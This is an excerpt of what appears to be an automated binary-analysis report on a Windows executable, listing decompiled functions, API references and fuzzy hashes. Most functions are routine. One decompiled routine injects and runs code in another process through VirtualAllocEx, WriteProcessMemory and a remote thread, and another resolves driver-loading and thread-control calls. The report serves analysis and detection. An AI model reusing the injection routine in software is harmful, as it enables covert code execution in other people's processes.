                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                0x00404951
                                                                                                                0x00404952
                                                                                                                0x00404956
                                                                                                                0x004049a1
                                                                                                                0x00404958
                                                                                                                0x00404959
                                                                                                                0x0040495b
                                                                                                                0x0040495b
                                                                                                                0x0040495f
                                                                                                                0x00404961
                                                                                                                0x00404963
                                                                                                                0x0040496d
                                                                                                                0x00404975
                                                                                                                0x00404977
                                                                                                                0x0040497b
                                                                                                                0x00404985
                                                                                                                0x0040498a
                                                                                                                0x0040498e
                                                                                                                0x00404993
                                                                                                                0x0040499d
                                                                                                                0x0040499d

                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                0x0040543f
                                                                                                                0x00405456
                                                                                                                0x00405462
                                                                                                                0x00405467
                                                                                                                0x0040546d
                                                                                                                0x00405478
                                                                                                                0x00405489
                                                                                                                0x0040548d
                                                                                                                0x00000000
                                                                                                                0x00405492
                                                                                                                0x00405496

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                0x00408f4c
                                                                                                                0x00408f57
                                                                                                                0x00408f60
                                                                                                                0x00408f62
                                                                                                                0x00408f67
                                                                                                                0x00408f67
                                                                                                                0x00408f71

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                0x004098fa
                                                                                                                0x004098fc
                                                                                                                0x00409901
                                                                                                                0x00409907
                                                                                                                0x00000000
                                                                                                                0x0040991c
                                                                                                                0x00409918
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                0x004095da
                                                                                                                0x004095da
                                                                                                                0x004095de
                                                                                                                0x004095e1
                                                                                                                0x004095e7
                                                                                                                0x004095e7
                                                                                                                0x004095ee
                                                                                                                0x004095fc

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                0x00408e38
                                                                                                                0x00408e44
                                                                                                                0x00408e56
                                                                                                                0x00408e68
                                                                                                                0x00408e7a
                                                                                                                0x00408e8c
                                                                                                                0x00408e9e
                                                                                                                0x00408eb0
                                                                                                                0x00408ec2
                                                                                                                0x00408ed4
                                                                                                                0x00408ee6
                                                                                                                0x00408ef8
                                                                                                                0x00408f0a
                                                                                                                0x00408f1c
                                                                                                                0x00408f21
                                                                                                                0x00408f23
                                                                                                                0x00000000
                                                                                                                0x00408f28
                                                                                                                0x00408f29

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                0x0040a474
                                                                                                                0x0040a47b
                                                                                                                0x0040a48a
                                                                                                                0x0040a48d
                                                                                                                0x0040a48f
                                                                                                                0x0040a497
                                                                                                                0x0040a49a
                                                                                                                0x0040a6f7
                                                                                                                0x0040a6f9
                                                                                                                0x0040a700
                                                                                                                0x0040a700
                                                                                                                0x0040a4ad
                                                                                                                0x0040a4b3
                                                                                                                0x0040a4b8
                                                                                                                0x0040a4c6
                                                                                                                0x0040a4cc
                                                                                                                0x0040a4cf
                                                                                                                0x0040a4dd
                                                                                                                0x0040a4e2
                                                                                                                0x0040a4e3
                                                                                                                0x0040a4ea
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4e5
                                                                                                                0x0040a4ec
                                                                                                                0x0040a4f6
                                                                                                                0x0040a4fe
                                                                                                                0x0040a503
                                                                                                                0x0040a504
                                                                                                                0x0040a50b
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a506
                                                                                                                0x0040a50d
                                                                                                                0x0040a512
                                                                                                                0x0040a518
                                                                                                                0x0040a51c
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a523
                                                                                                                0x0040a528
                                                                                                                0x0040a537
                                                                                                                0x0040a54c
                                                                                                                0x0040a539
                                                                                                                0x0040a544
                                                                                                                0x0040a549
                                                                                                                0x0040a558
                                                                                                                0x0040a56d
                                                                                                                0x0040a55a
                                                                                                                0x0040a565
                                                                                                                0x0040a56a
                                                                                                                0x0040a579
                                                                                                                0x0040a591
                                                                                                                0x0040a57b
                                                                                                                0x0040a589
                                                                                                                0x0040a58e
                                                                                                                0x0040a5b4
                                                                                                                0x0040a5b7
                                                                                                                0x0040a5cc
                                                                                                                0x0040a5cf
                                                                                                                0x0040a5d4
                                                                                                                0x0040a5d7
                                                                                                                0x0040a6ed
                                                                                                                0x0040a5e5
                                                                                                                0x0040a5fa
                                                                                                                0x0040a60b
                                                                                                                0x0040a61a
                                                                                                                0x0040a620
                                                                                                                0x0040a623
                                                                                                                0x0040a62b
                                                                                                                0x0040a62f
                                                                                                                0x0040a632
                                                                                                                0x0040a659
                                                                                                                0x0040a634
                                                                                                                0x0040a635
                                                                                                                0x0040a641
                                                                                                                0x0040a648
                                                                                                                0x0040a648
                                                                                                                0x0040a668
                                                                                                                0x0040a66e
                                                                                                                0x0040a685
                                                                                                                0x0040a69e
                                                                                                                0x0040a6a8
                                                                                                                0x0040a6ad
                                                                                                                0x0040a6bd
                                                                                                                0x0040a6c5
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d0
                                                                                                                0x0040a6d1
                                                                                                                0x0040a6d2
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6d3
                                                                                                                0x0040a6c8
                                                                                                                0x0040a6d7
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6dc
                                                                                                                0x0040a6d7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
